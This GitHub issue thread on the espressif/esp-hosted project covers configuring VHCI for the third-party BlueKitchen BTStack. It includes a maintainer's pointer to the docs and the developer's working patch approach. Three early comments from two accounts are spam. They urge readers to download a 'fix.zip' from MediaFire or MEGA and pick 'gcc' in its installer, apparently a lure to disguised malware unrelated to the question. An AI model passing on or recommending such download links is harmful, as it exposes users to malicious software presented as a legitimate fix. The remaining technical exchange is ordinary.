espressif/esp-hosted #464: BT VHCI configuration for 3rd party stack

AndyDevLat, 2024-08-25:
What is correct way to configure ESP hosted for 3rd party BTStack operation via VHCI?  At the moment it supports NimBLE only.
But i want to use BlueKitchen BtStack which uses esp_vhci_host_... APIs to access controller.
More specifically, it uses these APIs:
esp_vhci_host_register_callback
esp_vhci_host_check_send_available
esp_vhci_host_send_packet 

Do i need to clone ESP Hosted component and patch host\drivers\bt\vhci_drv.c file for this purpose?
Or is there some other solution?
Note that I am not considering UART H4 mode yet, as it requires 4 more GPIO pins and more difficult to setup.

diablo00001, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

mantriyogesh, 2024-08-26:
Hello @AndyDevLat ,

Thank you for the detailed question.

You can have a look at 
https://github.com/espressif/esp-hosted/blob/feature/esp_as_mcu_host/docs/bluetooth_implementation.md#4-nimble-host-stack

The lower level APIs used from NimBLE are shown there. These nimBLE Specific APIs can be ported/replaced to one's from BlueKitchen.

AndyDevLat, 2024-08-26:
Thank you! I figured out, that i need to disable BT support in sdkconfig (CONFIG_BT_ENABLED must not be defined) and replace esp_vhci_host_send_packet calls with direct calls to esp_hosted_tx. 
And i use free_buf_fun as callback that packet was sent.  Seems to work.
The only downside is that i had to clone esp_hosted to my own component, because i need to add WEAK attribute to hci_rx_handler inside esp_hosted\host\drivers\bt\hci_stub_drv.c, as i have my own implementation for it. I suggest you add WEAK attribute to official code like this:
WEAK int hci_rx_handler(interface_buffer_handle_t *buf_handle).
Then espessif esp_hosted component can be used as is without patching, just need to add some header for missing definitions and that's it.

mantriyogesh, 2024-08-26:
Understood. Point taken.

Also, if you are comfortable, you can also raise PR with your BlueKitchen port. Will be helpful for us and others as lot.

AndyDevLat, 2024-08-26:
Thank  you, will do!

AndyDevLat, 2024-08-29:
I have also made another optimization for BtStack:  inside process_spi_rx_buf i do not forward ESP_HCI_IF packets to spi_process_rx_task via _h_queue_item. Instead i call hci_rx_handler directly and then call spi_buffer_free. This is because BtStack already has own ring buffer and queues incoming packets for processing inside own thread. This way we remove unnecessary packet copying and reduce latency. Maybe it would be good idea to add some menuconfig option for this.

mantriyogesh, 2024-08-29:
Hmm. Seems great.. will add shortly. Else wait for your PR..